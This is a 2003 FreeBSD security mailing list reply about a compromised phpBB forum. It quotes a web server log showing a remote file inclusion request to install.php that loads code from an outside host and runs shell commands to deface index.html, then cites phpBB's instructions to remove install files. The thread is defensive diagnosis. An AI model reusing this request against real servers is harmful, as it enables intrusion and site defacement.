From owner-freebsd-security@FreeBSD.ORG Fri Nov 7 11:49:03 2003 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 071C816A4CE for ; Fri, 7 Nov 2003 11:49:03 -0800 (PST) Received: from ns1.tiadon.com (SMTP.tiadon.com [69.27.132.161]) by mx1.FreeBSD.org (Postfix) with ESMTP id 30EDB43F85 for ; Fri, 7 Nov 2003 11:49:02 -0800 (PST) (envelope-from kdk@daleco.biz) Received: from daleco.biz ([69.27.131.0]) by ns1.tiadon.com with Microsoft SMTPSVC(6.0.3790.0); Fri, 7 Nov 2003 13:51:46 -0600 Message-ID: <3FABF71A.7000903@daleco.biz> Date: Fri, 07 Nov 2003 13:48:42 -0600 From: "Kevin D. Kinsey, DaleCo, S.P." User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.4) Gecko/20030920 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Miha Nedok References: <20031107125529.R19165@voyager.zrcalo.si> <3FAB8B3A.7020908@remotelab.org> <20031107132650.H19165@voyager.zrcalo.si> In-Reply-To: <20031107132650.H19165@voyager.zrcalo.si> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-OriginalArrivalTime: 07 Nov 2003 19:51:47.0203 (UTC) FILETIME=[93D70530:01C3A568] cc: freebsd-security@freebsd.org Subject: Re: hack ? - urgent - false FreeBSD alarm X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 07 Nov 2003 19:49:03 -0000 Miha Nedok wrote: >Hi ! > >It is phpBB related. I found in logs: >200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET >/forum/install.php?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;cd%20www.site- >name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:%20ir4dex@hotmail.com%20>%20index.html >HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" > > > >I just did chmod 000 `find -name 'install.php'` for a workaround. > >Apache is latest: Nov 3 18:08 apache+mod_ssl-1.3.28+2.8.15_2 . > > > >-Miha > > > > > From ~/phpp/docs/Install.html: _6. Important post-Install tasks for all installation methods_ Once you have succssfully installed phpBB 2.0.0 you *MUST* ensure you remove install.php, upgrade.php and update_to_FINAL.php files. Leaving these in place is a _very serious potential security issue_. Additionally you may delete the db/schemas, docs/ and contrib/ directories if you wish.